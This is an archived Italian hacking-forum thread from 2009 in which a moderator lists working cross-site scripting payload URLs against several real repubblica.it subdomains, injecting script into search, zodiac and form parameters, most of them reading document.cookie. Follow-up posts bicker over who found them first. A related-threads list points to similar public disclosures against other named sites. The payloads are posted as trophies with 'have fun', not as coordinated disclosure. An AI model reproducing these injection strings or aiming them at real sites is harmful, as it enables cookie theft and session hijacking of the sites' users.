Current time: 20-06-2013, 04:46 AM | Shoutbox Hello There, Guest! (LoginRegister)


Post Reply  Post Thread 
[New Multiple XSS/redirect vuln] Repubblica.it
Author Message
xados
Moderator
****


Posts: 69
Group: Moderators
Joined: Oct 2008
Status: Offline
Reputation: 1
Post: #1
[New Multiple XSS/redirect vuln] Repubblica.it

I discovered TOOOO MUCH new vuln on .repubblica.it sites.

[+] XSS (Get & Post):

Code:
http://annunci.repubblica.it/italia/tutti/-/ricerca-%22%3E%3CBODY%20ONLOAD=alert%28%27xados%5Bat%5Dhotmail%5Bdot%5Dit%27%29%3E


Code:
In tutti gli imput della pagina
http://oroscopo.seidimoda.repubblica.it/tema/tema_natale.php

ad esempio: Nome*: "><script>alert(1)</script>
ecc..


Code:
http://oroscopo.seidimoda.repubblica.it/zodiaco.php?segno=%22%3E%3Cmarquee%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C/marquee%3E


Code:
http://oroscopo.seidimoda.repubblica.it/tema/affinita_coppia.php
tutti gli input !


Code:
http://oroscopo.seidimoda.repubblica.it/tema/oroscopo_giorno_transiti.php
tutti gli input ! (ad.esempio nome:"><script>alert(1)</script>)


Code:
http://dweb.repubblica.it/dettaglio/lautunno-del-benessere/25687?type=//xados--%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Ciframe%20src=%22http://www.xssed.com%22%3E%3C/iframe%3E


Code:
http://dweb.repubblica.it/dettaglio/uva-e-mele/25763?type=ModaGuida&parentTitle=L%2527autunno%2bdel%2bbenessere&parentId=25687&parentCat=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E


Code:
http://seidimoda.repubblica.it/ricerca_gossip?keyword=%22//%3Cmarquee%3E%3Ch1%3Exados[at]hotmail[dot]it%3Ch1%3E%3C/marquee%3E%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&search_type=fast


Icon_twisted:icon_twisted:Icon_twisted:icon_twisted:
when i smoke ganja i love xss Icon_mrgreen

have fun
xados

Firefox Windows XP/2003
Browser e O.S.: 
22-09-2009 11:10 PM
Visit this user's website Find all posts by this user Quote this message in a reply
Langy
Administrator
*******


Posts: 8.464
Group: Administrators
Joined: Sep 2007
Status: Offline
Reputation: 10
Post: #2
RE: [New Multiple XSS/redirect vuln] Repubblica.it

Buhauhua grande

su seidimoda.repubblica.it la trovai io pero'!

http://xssed.com/mirror/49637/

non fottermi le xss ;)


"There is no patch for human stupidity" - K. D. M.
Firefox Linux
Browser e O.S.: 
23-09-2009 11:54 AM
Visit this user's website Find all posts by this user Quote this message in a reply
xados
Moderator
****


Posts: 69
Group: Moderators
Joined: Oct 2008
Status: Offline
Reputation: 1
Post: #3
RE: [New Multiple XSS/redirect vuln] Repubblica.it

cazzo lo sai che non sono il tipo che fotte xss.
è solo che ho guardato le pagine ed infatti è diversa, ma stessa var quindi lol scusa

Firefox Windows XP/2003
Browser e O.S.: 
23-09-2009 09:49 PM
Visit this user's website Find all posts by this user Quote this message in a reply
Post Reply  Post Thread 

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [XSS] www.senato.it - Senato della Repubblica Langy 3 687 06-09-2012 10:53 PM
Last Post: NeincibAmbiff
  ad.it.doubleclick.net [Redirect] RedTuning 3 2.050 29-08-2012 05:38 AM
Last Post: hack_cc_fresh_good
  [multiple XSS] www.ask.com xados 9 1.093 20-09-2009 08:25 AM
Last Post: Joyb0y
  [Multiple vulnerability] www.scribd.com xados 0 972 18-09-2009 10:53 PM
Last Post: xados
  [XSS] annunci.repubblica.it Langy 2 611 21-05-2009 09:24 AM
Last Post: Langy
  [redirect] velvet.repubblica.it xados 0 423 20-05-2009 09:20 PM
Last Post: xados
  [redirect] www.ferrero.it xados 0 524 15-03-2009 10:43 PM
Last Post: xados
  [XSS Multiple] www.sonyericsson.com xados 0 597 31-01-2009 07:50 PM
Last Post: xados
  CMS AspCode Multiple vulnerability [XSS] xados 0 386 17-11-2008 08:13 PM
Last Post: xados
  [XSS Multiple] Camera dei deputati xados 0 441 15-11-2008 03:45 PM
Last Post: xados

View a Printable Version
Send this Thread to a Friend
Subscribe to this Thread | Add Thread to Favorites